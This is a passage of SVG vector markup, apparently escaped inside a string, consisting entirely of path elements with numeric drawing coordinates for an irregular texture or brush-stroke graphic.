-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path 